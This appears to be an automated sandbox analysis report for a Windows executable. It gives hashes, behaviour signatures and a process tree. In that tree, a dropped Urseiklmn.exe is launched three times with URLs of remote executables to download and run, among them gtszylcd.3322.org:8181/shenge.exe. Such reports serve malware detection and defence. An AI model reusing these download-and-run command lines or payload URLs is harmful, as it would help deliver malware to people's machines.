adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7

Analysis

max time kernel
228s
max time network
322s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
29/11/2022, 03:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe
Size

351KB
MD5

d758c3bc9f30553157d9accb22dc8897
SHA1

aa888695f244306faea62beeb497f0dc4381905d
SHA256

adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7
SHA512

88ce9c8effc66b8c3da800fc252d6db88757535ebc279415b33ed0913cc117fd7a0b3ae8e32960864a9d00e3c05f42ad4812926445e2981079b6060cf6f093e4
SSDEEP

6144:BME1nmg1tDbJ5621YNzigKarmXGfol3MavBGL8ap7mdALnXOGkUTYAm802G1wZ7C:ugnJzqAlLvBva7m+Ln5kcjhHG1+UWw

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
332	Urseiklmn.exe
884	Urseiklmn.exe
2000	Urseiklmn.exe

Loads dropped DLL 9 IoCs

pid	Process
1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe
332	Urseiklmn.exe
332	Urseiklmn.exe
1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe
884	Urseiklmn.exe
884	Urseiklmn.exe
1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe
2000	Urseiklmn.exe
2000	Urseiklmn.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1164 wrote to memory of 332	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	28
PID 1164 wrote to memory of 332	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	28
PID 1164 wrote to memory of 332	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	28
PID 1164 wrote to memory of 332	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	28
PID 1164 wrote to memory of 332	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	28
PID 1164 wrote to memory of 332	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	28
PID 1164 wrote to memory of 332	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	28
PID 1164 wrote to memory of 884	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	31
PID 1164 wrote to memory of 884	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	31
PID 1164 wrote to memory of 884	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	31
PID 1164 wrote to memory of 884	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	31
PID 1164 wrote to memory of 884	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	31
PID 1164 wrote to memory of 884	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	31
PID 1164 wrote to memory of 884	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	31
PID 1164 wrote to memory of 2000	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	33
PID 1164 wrote to memory of 2000	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	33
PID 1164 wrote to memory of 2000	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	33
PID 1164 wrote to memory of 2000	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	33
PID 1164 wrote to memory of 2000	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	33
PID 1164 wrote to memory of 2000	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	33
PID 1164 wrote to memory of 2000	1164	adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe	33

C:\Users\Admin\AppData\Local\Temp\adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe
"C:\Users\Admin\AppData\Local\Temp\adf3b5f6ff5510521cec6cd1a7aa7a40f926e0144d28204754ff948973d038e7.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1164
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://gtszylcd.3322.org:8181/shenge.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:332
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://d1.downxia.net/downloader/setup3002.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:884
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://dl.youbak.com/msn/software/partner/mfq/haoya.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe

Filesize
499KB

MD5
783291f2ef79f9537cc509c53076c3b3

SHA1
855265fd62d97bf04cda9a8d1cf0f3f6ede9300f

SHA256
5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4

SHA512
2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf

Download Submit
memory/1164-54-0x0000000076931000-0x0000000076933000-memory.dmp

Filesize
8KB

Download